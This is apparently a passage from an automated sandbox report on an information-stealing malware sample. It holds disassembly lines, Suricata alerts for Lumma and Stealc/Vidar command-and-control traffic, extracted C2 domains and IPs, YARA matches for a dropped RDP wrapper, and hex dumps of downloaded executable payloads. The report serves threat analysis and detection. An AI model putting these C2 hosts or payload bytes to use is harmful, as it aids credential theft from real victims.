                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+01h], 00000000h8_2_0040F7E3
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+000001C8h]8_2_00432830
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000198h]8_2_00432830
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al8_2_00432830
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_00432830
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_00432830
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_004338C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_004338C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_004338C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_004338C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al8_2_004338C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al8_2_004338C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al8_2_004338C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_004338C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h8_2_004408E6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+14h]8_2_00444970
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+00000884h]8_2_00429978
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al8_2_00434990
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_00434990
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al8_2_00434990
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]8_2_00420A70
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h8_2_00440A70
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]8_2_0040FA20
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]8_2_0040FA20
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_0040FA20
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh8_2_0042CAD0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh8_2_0042CAD0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_00421AD0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh8_2_00444BC0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h8_2_0041AB90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh8_2_00448B90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]8_2_00430CC0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]8_2_00405CF0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]8_2_00404CB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]8_2_00449D22
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh8_2_00445DE0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]8_2_00448D80
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]8_2_0042FE26
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]8_2_0042FE26
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add ebx, 02h8_2_00413EEC
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]8_2_00413EEC
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then dec ebx8_2_0043FE90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h8_2_00426FC0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp dword ptr [004521ECh]8_2_0041FFD8
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+eax+01h], 00000000h8_2_0042DFE0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]8_2_0043BFF0

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2056176 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wallkedsleeoi .shop) : 192.168.2.4:52568 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.4:51877 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056177 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI) : 192.168.2.4:49766 -> 104.21.36.139:443
                                Source: Network trafficSuricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.4:49767 -> 104.21.4.136:443
                                Source: Network trafficSuricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.4:62977 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.4:49768 -> 188.114.97.3:443
                                Source: Network trafficSuricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.4:56240 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.4:49770 -> 188.114.96.3:443
                                Source: Network trafficSuricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.4:63460 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.4:49771 -> 188.114.97.3:443
                                Source: Network trafficSuricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.4:49981 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.4:49773 -> 172.67.162.108:443
                                Source: Network trafficSuricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.4:49776 -> 188.114.96.3:443
                                Source: Network trafficSuricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.4:51859 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.4:64698 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.4:49777 -> 188.114.97.3:443
                                Source: Network trafficSuricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.4:65108 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.4:49779 -> 172.67.208.139:443
                                Source: Network trafficSuricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:49778 -> 45.132.206.251:80
                                Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49742 -> 5.75.211.162:443
                                Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.4:49744
                                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.4:49743
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49766 -> 104.21.36.139:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49766 -> 104.21.36.139:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49770 -> 188.114.96.3:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49770 -> 188.114.96.3:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49773 -> 172.67.162.108:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49773 -> 172.67.162.108:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49777 -> 188.114.97.3:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49777 -> 188.114.97.3:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49776 -> 188.114.96.3:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49779 -> 172.67.208.139:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49779 -> 172.67.208.139:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49767 -> 104.21.4.136:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49767 -> 104.21.4.136:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49776 -> 188.114.96.3:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49768 -> 188.114.97.3:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49768 -> 188.114.97.3:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49771 -> 188.114.97.3:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49771 -> 188.114.97.3:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49781 -> 172.67.128.144:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49781 -> 172.67.128.144:443
                                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.4:49790
                                Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.4:49791
                                Source: Malware configuration extractorURLs: ghostreedmnu.shop
                                Source: Malware configuration extractorURLs: wallkedsleeoi.shop
                                Source: Malware configuration extractorURLs: stogeneratmns.shop
                                Source: Malware configuration extractorURLs: fragnantbui.shop
                                Source: Malware configuration extractorURLs: reinforcenh.shop
                                Source: Malware configuration extractorURLs: gutterydhowi.shop
                                Source: Malware configuration extractorURLs: drawzhotdog.shop
                                Source: Malware configuration extractorURLs: offensivedzvju.shop
                                Source: Malware configuration extractorURLs: vozmeatillu.shop
                                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                                Source: Yara matchFile source: 19.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 19.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000000.2436777725.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: RDPWInst.exe PID: 3168, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
                                Source: global trafficTCP traffic: 192.168.2.4:49784 -> 8.46.123.33:3389
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:15:06 GMTContent-Type: application/octet-streamContent-Length: 385064Last-Modified: Thu, 26 Sep 2024 22:09:48 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5dbac-5e028"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 db f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b0 05 00 00 08 00 00 00 00 00 00 3e ce 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 cd 05 00 53 00 00 00 00 e0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 ba 05 00 28 26 00 00 00 00 06 00 0c 00 00 00 b0 cc 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 ae 05 00 00 20 00 00 00 b0 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 e0 05 00 00 06 00 00 00 b2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 06 00 00 02 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ce 05 00 00 00 00 00 48 00 00 00 02 00 05 00 80 bc 05 00 30 10 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ad 79 1c 59 59 6c 14 76 5e 87 dc f4 35 66 85 48 24 b2 ce 02 9f f7 2f fa 57 cb 61 b6 7a 7a f0 df 35 4f 10 9b 37 1c cd 12 66 9e 17 53 d5 6c 5c f1 52 42 af 6b 08 35 e6 ea 8e 7f 45 71 7f 85 08 89 95 76 f5 df 0e a5 d6 fc 42 00 1a 12 66 8a 8c a2 0d cc d6 dd fd 9a b7 bc c6 39 76 02 fa f3 3b 28 cc 46 d9 81 20 0a 4a 2a b2 67 cc 69 96 ae 28 1e d1 d6 18 42 b3 42 cb 4d 9a 73 8f a0 c3 3c 0d c8 75 62 e5 20 1b 6c f5 5d b3 87 96 ab bd 51 67 83 b4 d5 5c c3 42 63 2a 84 b1 06 91 e4 24 95 19 a0 1f c7 f8 aa f8 66 56 47 5a 94 db 00 2e f4 cb 98 c5 a0 c0 c1 38 d1 da 99 e2 a3 9c 0e 6c 48 3b 21 f8 0a 17 22 ae e3 f0 fb 82 f0 70 98 55 4f 04 38 d7 59 22 c7 e2 fb f1 64 f2 d1 be 5c eb 0e a2 64 44 22 b3 73 6d 7d cb 63 23 15 3f e1 34 3f 13 f1 59 23 dc 04 b7 a4 e3 17 cb 30 bb 1b 1d ff 56 53 cd bd 1d 58 bb 10 7c 89 e7 0c c4 9d 47 16 2e cb 67 ac 3a 21 72 4d 5b 7e 1b 01 94 65 bf 42 70 d5 e0 62 7a a7 7b 84 1c 13 a4 60 35 1d cc f3 7
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:15:08 GMTContent-Type: application/octet-streamContent-Length: 413224Last-Modified: Thu, 26 Sep 2024 22:09:34 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5db9e-64e28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed da f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1e 06 00 00 08 00 00 00 00 00 00 3e 3c 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 3b 06 00 53 00 00 00 00 40 06 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 28 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 b0 3a 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 1c 06 00 00 20 00 00 00 1e 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 40 06 00 00 06 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 06 00 00 02 00 00 00 26 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 3c 06 00 00 00 00 00 48 00 00 00 02 00 05 00 80 2a 06 00 30 10 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa 88 91 bf 5e 83 38 3d 2e 1f 51 05 cf 88 76 20 41 c7 95 33 5b 52 f9 4a 2a f9 82 5f c1 c3 ff 82 66 8e 1a 39 be 5c 6c 9b f9 76 43 23 53 73 6e 42 7e af 45 c2 d5 7e e6 69 03 87 37 0a 7d 2b f1 56 fc 0f ec 23 c9 db 38 17 bf 66 d1 23 58 57 9c b5 06 ce 62 88 e7 bd 91 11 28 94 81 83 aa 92 c9 c2 8e d2 87 dd ec a8 98 87 c8 07 8b 3c 4f b6 ac bf ed bf 07 19 c0 31 1b 24 cc 3d 55 4e 38 dd 29 a8 19 4c 4c 7f 0c af ed 28 4b fe 03 12 d6 b5 2c 72 c8 ca d7 b3 ae c5 9b 25 39 15 4c 9f 59 0e 3d 30 c4 b5 89 54 34 83 26 8a bd 1f 9d 1e 64 ee d4 ba 2e 0a 28 55 17 81 d3 ce 92 27 3d 22 80 85 94 28 3e e0 64 98 7f 2b f2 0c 39 32 a5 1a ac 70 38 c5 31 9a 90 50 61 5c 71 b7 ee e5 d8 af 5d 58 96 2f 61 fc 40 30 43 ff 50 51 8c b9 d4 42 fc 07 ed 76 89 17 36 04 04 f7 d0 6c 65 32 07 b1 95 85 34 49 33 02 b4 02 02 ce d3 d2 50 a3 43 3a 11 09 b2 76 98 7d 89 51 c9 77 70 11 89 53 28 41 ec 51 67 16 27 16 0b 4e 09 04 5f 58 f5 6d 76 67 ba 1c d
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:15:10 GMTContent-Type: application/octet-streamContent-Length: 73216Last-Modified: Thu, 26 Sep 2024 22:01:15 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5d9ab-11e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 0f 16 c8 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 04 01 00 00 18 00 00 00 00 00 00 0e 22 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 21 01 00 53 00 00 00 00 40 01 00 17 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 02 01 00 00 20 00 00 00 04 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 17 14 00 00 00 40 01 00 00 16 00 00 00 06 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 01 00 00 02 00 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 21 01 00 00 00 00 00 48 00 00 00 02 00 05 00 74 fc 00 00 44 25 00 00 03 00 02 00 06 00 00 06 80 2c 00 00 f4 cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 22 00 00 06 2a 1e 02 28 1a 00 00 0a 2a 36 02 7c 07 00 00 04 03 28 30 00 00 0a 2a 56 73 31 00 00 0a 72 fe 01 00 70 28 02 00 00 06 28 32 00 00 0a 2a 4a 73 31 00 00 0a 02 73 33 00 00 0a 03 28 34 00 00 0a 2a 5a 72 a6 02 00 70 28 02 00 00 06 28 11 00 00 06 02 6f 45 00 00 0a 2a b2 02 28 4e 00 00 0a 3a 01 00 00 00 2a 72 0c 03 00 70 28 02 00 00 06 02 72 26 03 00 70 28 02 00 00 06 28 4f 00 00 0a 28 10 00 00 06 2a e6 72 a6 03 00 70 28 02 00 00 06 28 11 00 00 06 72 d8 03 00 70 28 02 00 00 06 6f 45 00 00 0a 3a 0b 00 00 00 72 0a 04 00 70 28 02 00 00 06 2a 72 d8 03 00 70 28 02 00 00 06 2a aa 72 4d 06 00 70 28 02 00 00 06 02 7b 0a 00 00 04 72 4d 06 00 70 28 02 00 00 06 28 52 00 00 0a 6f 53 00 00 0a 28 54 00 00 0a 2a 62 02 3a 0b 00 00 00 72 00 07 00 70 28 02 00 00 06 2a 02 6f 55 00 00 0a 2a 13 30 04 00 6e 00 00 00 01 00 00 11 00 02 28 0a 00 00 0a 0a 73 0b 00 00 0a 28 0c 00 00 0a 72 01 00 00 70 6f 0d 00 00
